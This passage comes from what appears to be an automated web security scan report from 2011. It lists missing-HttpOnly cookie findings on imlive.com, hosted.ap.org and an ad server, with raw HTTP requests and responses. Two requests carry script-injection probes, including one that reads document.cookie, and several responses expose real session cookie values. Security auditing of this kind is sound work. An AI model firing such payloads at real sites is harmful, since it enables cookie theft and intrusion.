Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pes=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:17:10 GMT; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:10 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

11.322. http://events.cbs6albany.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; path=/; expires=Sat, 28-Jan-2012 17:37:18 GMT
zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; path=/; expires=Sat, 28-Jan-2012 17:37:18 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.323. http://fr.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=49cda1d5-e336-4ec8-bd41-d08c0704718a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:18 GMT; path=/
ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.324. http://fr.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=95c03f16-e842-40fb-9f26-d7997999e33d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pfr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:17:19 GMT; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=brffclf15q0uso45xmkvbd45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=brffclf15q0uso45xmkvbd45; path=/; HttpOnly
Set-Cookie: spvdr=vd=95c03f16-e842-40fb-9f26-d7997999e33d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pfr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:17:19 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:18 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

11.325. http://gr.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gr.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=acc31a9c-64aa-4483-a09d-06f887e53a48&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:21 GMT; path=/
igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.326. http://gr.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gr.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=b6d62c3b-9b3a-4c2d-a769-ff605e4db3de&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:23 GMT; path=/
igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pgr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:17:23 GMT; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fuifju55vr33or45jnecwi55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fuifju55vr33or45jnecwi55; path=/; HttpOnly
Set-Cookie: spvdr=vd=b6d62c3b-9b3a-4c2d-a769-ff605e4db3de&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:23 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pgr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:17:23 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

11.327. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SITE=MABOH; Path=/
SECTION=DJSP_COMPLETE; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

11.328. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SITE=MABOH; Path=/
SECTION=DJSP_COMPLETE; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

11.329. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SITE=MABOH; Path=/
SECTION=DJSP_COMPLETE; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html?CN=AP707&valid=NO&set=new&view=quote&ticker= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

11.330. http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SITE=MABOH; Path=/
SECTION=DJSP_COMPLETE; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE HTTP/1.1
Host: hosted.ap.org
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.331. http://hosted.ap.org/lineups/NEWSBRIEF-bulleted.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/lineups/NEWSBRIEF-bulleted.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SITE=MAPIT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lineups/NEWSBRIEF-bulleted.js?SITE=MAPIT&SECTION=HOME HTTP/1.1
Host: hosted.ap.org
Proxy-Connection: keep-alive
Referer: http://www.berkshireeagle.com/?f0ba9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e6d2fe4b4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MAPIT; Path=/
Set-Cookie: SECTION=HOME; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=61
Date: Sat, 29 Jan 2011 13:40:14 GMT
Connection: close
Content-Length: 2200

document.write( '<li class="ap-bulleted-headline-2"><a href="http://hosted.ap.org/dynamic/stories/M/ML_EGYPT_PROTEST?SITE=MAPIT&SECTION=HOME&TEMPLATE=DEFAULT">Massive demonstration swells in downtown
...[SNIP]...

11.332. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c=201003Jhk3Ji23Jhj0000-N81mUzJ_0VX17742830124_358090_2FX10137980545300003K99;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:03 GMT;Path=/servlet/ajrotator/track/pt63693

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.333. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63722/0/vj

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

i=201013Jhk3Ji23Jhj0000-N81mUzJ_0VX17740399776_948869_2FX101379805453000036Iu;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:14:35 GMT;Path=/servlet/ajrotator/track/pt63693
ajcmp=20236X6003Csd;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:14:35 GMT;Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.334. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c=201003Ptn3Ji53Por0000-N81mUzJ_0VX17742515437_149163_2FX101379805453000035Ds;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:05 GMT;Path=/servlet/ajrotator/track/pt63693

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Location: http://
Server: JBird/1.0b
Date: Fri, 28 Jan 2011 16:46:05 GMT
Connection: close
Set-Cookie: c=201003Ptn3Ji53Por0000-N81mUzJ_0VX17742515437_149163_2FX101379805453000035Ds;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:05 GMT;Path=/servlet/ajrotator/track/pt63693

11.335. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63723/0/vj

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:48:32 GMT;Path=/servlet/ajrotator/track/pt63693
ajcmp=20236X631Sh003KAA;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:48:32 GMT;Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.336. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c=201003Ji03JiF3JhX0000-N81mUzJ_0VX17743400865_266261_2FX10137980545300003FMt;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 17:26:43 GMT;Path=/servlet/ajrotator/track/pt63689

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Location: http://
Server: JBird/1.0b
Date: Fri, 28 Jan 2011 17:26:43 GMT
Connection: close
Set-Cookie: c=201003Ji03JiF3JhX0000-N81mUzJ_0VX17743400865_266261_2FX10137980545300003FMt;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 17:26:43 GMT;Path=/servlet/ajrotator/track/pt63689

11.337. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63733/0/vj

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 16:41:44 GMT;Path=/servlet/ajrotator/track/pt63689
ajcmp=20236X00631Sh00PZ;Max-Age=63072000;expires=Sun, 27 Jan 2013 16:41:44 GMT;Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.338. http://imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0W5s89nS82L1Y30bT54fyWa09YbZxWHM4PkcHt5cVPiM; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.339. http://imlive.com/GuestDiscountClubs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/GuestDiscountClubs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /webcam-sign-up/
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:52 GMT
Connection: close
Content-Length: 137

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fwebcam-sign-up%2f">here</a>.</h2>
</body></html>

11.340. http://imlive.com/awardarena/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/awardarena/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.341. http://imlive.com/becomehost.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/becomehost.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.342. http://imlive.com/categoryfs.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/categoryfs.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:17 GMT
Connection: close
Content-Length: 18918
Vary: Accept-Encoding

<html>
   <head>
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
       <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title>
       <meta name="d
...[SNIP]...

11.343. http://imlive.com/categoryms.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/categoryms.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:18 GMT
Connection: close
Content-Length: 21809
Vary: Accept-Encoding

<html>
   <head>
       <title>Mysticism & Spirituality Live Video Chat at ImLive</title>
       <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics
...[SNIP]...

11.344. http://imlive.com/disclaimer.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/disclaimer.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:24 GMT
Connection: close
Content-Length: 78840
Vary: Accept-Encoding

<html>
   <head>
